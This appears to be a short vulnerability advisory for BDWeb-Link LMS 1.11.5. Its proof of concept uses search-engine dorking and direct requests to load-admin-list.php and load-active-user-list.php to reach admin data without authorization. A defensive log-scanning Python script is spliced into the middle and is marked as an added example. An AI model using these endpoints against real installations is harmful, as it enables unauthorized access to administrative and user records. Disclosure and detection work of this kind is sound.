BDWeb-Link LMS 1.11.5 Insecure Direct Object Reference

BDWeb-Link LMS version 1.11.5 suffers from an insecure direct object reference that allows users to access the administrative interface.


SHA-256 | cbe0c3553ee75853516d659f6f557cd9eb41d8caa2ca9a849710a7ac8613d3f4

====================================================================================================================================
| # Title : BDWeb-Link Lms v1.11.5 Unauthorized administrative access Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) |
| # Vendor : https://bdweblink.com |
| # Dork : Developed by Developed by BD Web Link |
====================================================================================================================================

poc :


[+] Dorking in Google or other search engine.

[+] Use the payload to access the control panel and see the administration menu : load-admin-list.php or load-active-user-list.php

[+] https://127.0.0.1/bdweblink/load-active-user-list.php or https://127.0.0.1/bdweblink/load-admin-list.php
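
For defenders checking whether the two endpoints above were reached on their own installation, the following is an added example (not part of the original advisory or the vendor's code) that scans web server access logs for successful responses to them. It assumes Apache/Nginx combined log format; the host name `lms.example.test` and the sample log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Endpoints the advisory names as reachable without authorization.
SENSITIVE = {"load-admin-list.php", "load-active-user-list.php"}

# Assumed layout: ip - user [time] "METHOD target PROTO" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)")?'
)

def find_exposed_hits(lines, site_host):
    """Return {ip: [(time, path, direct)]} for 2xx responses on the sensitive endpoints."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed or non-matching line
        path = m["target"].split("?", 1)[0]          # drop the query string
        name = path.rsplit("/", 1)[-1].lower()       # file name, any install prefix
        if name not in SENSITIVE or not m["status"].startswith("2"):
            continue  # other pages, or redirects/denials (3xx/4xx)
        # "direct" = no Referer or an off-site one. Referer is client-supplied,
        # so it only helps prioritise; every 2xx hit still needs review.
        ref_host = urlsplit(m["referer"] or "").hostname
        direct = ref_host != site_host
        hits[m["ip"]].append((m["time"], path, direct))
    return dict(hits)

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [10/Jan/2023:10:01:02 +0000] "GET /bdweblink/load-admin-list.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jan/2023:10:01:09 +0000] "GET /bdweblink/load-active-user-list.php?page=2 HTTP/1.1" 200 7340 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [10/Jan/2023:10:05:00 +0000] "GET /bdweblink/load-admin-list.php HTTP/1.1" 200 5120 "https://lms.example.test/bdweblink/dashboard.php" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Jan/2023:10:06:00 +0000] "GET /bdweblink/load-admin-list.php HTTP/1.1" 302 0 "-" "curl/8.0"',
    '192.0.2.44 - - [10/Jan/2023:10:06:05 +0000] "GET /bdweblink/index.php HTTP/1.1" 200 900 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for ip, rows in find_exposed_hits(SAMPLE, "lms.example.test").items():
        for when, path, direct in rows:
            print(ip, when, path, "direct" if direct else "in-site referer")
```

Hits should be cross-checked against the application's own session or login records, since the access log alone cannot show whether the requesting client held an administrator session.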


Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================
